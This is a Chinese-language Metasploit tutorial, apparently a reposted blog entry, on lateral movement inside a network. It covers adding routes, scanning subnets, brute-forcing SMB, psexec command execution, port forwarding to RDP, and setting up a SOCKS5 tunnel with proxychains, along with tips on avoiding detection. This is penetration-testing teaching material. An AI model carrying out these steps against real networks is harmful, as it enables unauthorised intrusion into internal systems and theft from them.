4.MSF之基礎橫向滲透


 

一、添加路由

 

 

1、添加路由的原因:

  如果我們想繼續滲透內網、就要先查看網段,並為網段添加路由,如果我們不為網段添加路由的話,是探測不到該網段的其他主機的。

 

2、獲取網段:

shell --> ipconfig

run get_local_subnet

route list(查看路由表)

 

 

 

 

3、添加路由

run autoroute -s 【網段】                    //添加路由表方法一(在metepreter中)

run autoroute -p                             //打印路由表

backgroup --> route add 【網段】【掩碼】【session id】      //添加路由表

backgroup --> route remove 【網段】【掩碼】【session id】   //刪除路由表

route print    //打印路由表(msf機器的)

run arp_scanner -r          //掃描是否有存活主機(慎重考慮,使用該命令極易引起注意)

 

嘗試一下增刪路由表

 

 

 

 

 

用arp掃描,實戰還是建議用其他掃描,在msf中使用nmap掃描比arp靠譜多了。如果希望掃描端口,可以background后直接use一個portscan(如:auxiliary/scanner/portscan/tcp),然后把hosts設置為192.168.100.0/24

 

 

 

二、連接數據庫_postgresql

 

 

1、連接數據庫的原因:

如果不連接數據庫,msf一關,自己的滲透成果就沒了

 

2、安裝postgresql:

apt-get install postgresql -y

 

 

3、配置postgresql:

 

  ①修改postgresql系統用戶密碼:

echo "postgres:(想要修改的密碼)" | chpasswd      (這個是不交互的,執行就完事了)

 

  ②修改postgresql數據庫中默認用戶postgres的密碼

su postgres

psql

\password postgres    (這里是修改數據庫的密碼)

\q                  (退出)

exit                 (返回root用戶)

 

 

 

4、MSF連接數據庫:

① 把 db_connect postgres:password@127.0.0.1/msfdb 保存為⽂件 connection.rc

②  msfconsole -r connection.rc

 

db_status          //查看數據庫連接狀態

creds               //查看數據庫記錄

注:msfdb為新建的數據庫,可以隨意填寫

 

問題一:如果使用psql命令連接數據庫時出現:

 

輸入sudo service postgresql start ,執行后即可恢復正常

 

問題二:如果在msf中使用db_connect postgres:password@127.0.0.1/msfdb時爆出一下錯誤:

 

再開一個終端模擬器,輸入psql后新建數據庫即可

 

 

 

 

 

 

 

三、smb密碼爆破+遠程命令執行 

 

 

1、先添加路由,以便后續的端口掃描:

 

 

 

2、這里對整個網段進行端口掃描,發現106這台機子開放了445和3389端口

 

 

 

3、這里使用auxiliary/scanner/smb/smb_login,爆破smb,由於只是演示,我的smbuser和smbpass都只填了一個,實際應用中可以利用字典,例如:set rhosts file:/root/ip.txt、set userpass_file(添加密碼字典)、set user_file  (添加賬號字典)

 

 

 

實戰中爆破不會很快的

 

遠程命令執行:

 

search psexec 遠程命令執行  這東西,個人感覺不大好用
use 1
set command whoami
set rohosts IP

exploit

 

 

四、MSF端口轉發

 

 

1、端口轉發:

命令其實很簡單 portfwd add -l <msf接收的端口> -p <希望對方轉出來的端口> -r <對方ip>

 

 

2、mstsc打開遠程桌面連接,直接連上msf機器的6666端口就成了

 

 

 

 

 

 

五、Socks 代理

 

 

 

1、socks代理使用目的:

 

打個比方,如果你發現對方的web服務器后面還有三台內網機器,分別是OA、FTP、數據庫服務器,如果這時候使用socks代理在我們的vps與web服務器上搭建了一條隧道,此時我們就相當於“進入”web服務器體內,這就意味這我們可以通內網,對這三台內網機器為所欲為了。注意:Socks代理不支持icmp和arp協議

 

2、當我們拿到metepreter后,需要先添加一個路由

 

 

3、接着我們background,將session放至后台,在查找一下socks模塊,這里我們選擇socks5

 

 

 

4、配置一下選項,注意,如果srvhost為0.0.0.0時意味着其他用戶都可以利用端口進入這條隧道,內網滲透時最好不要這樣,有被發現的風險,因此我們可以設置srvhost為127.0.0.1,這樣只有我們能使用了

 

 

 

5、運行,然后jobs一下,發現已經開啟進程了

 

 

 

6、這里我們需要使用proxychains工具 ,可以直接用apt-get install proxychains 安裝一下

 

 

 

6. 接着我們用vi /etc/proxychains.conf  命令,拉到最下面更改一下配置,更改為我們剛剛配置socks5時使用的設置

 

 

 

7、然后就可以使用proxychains curl http://192.168.100.97 ,嘗試連接內網了

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM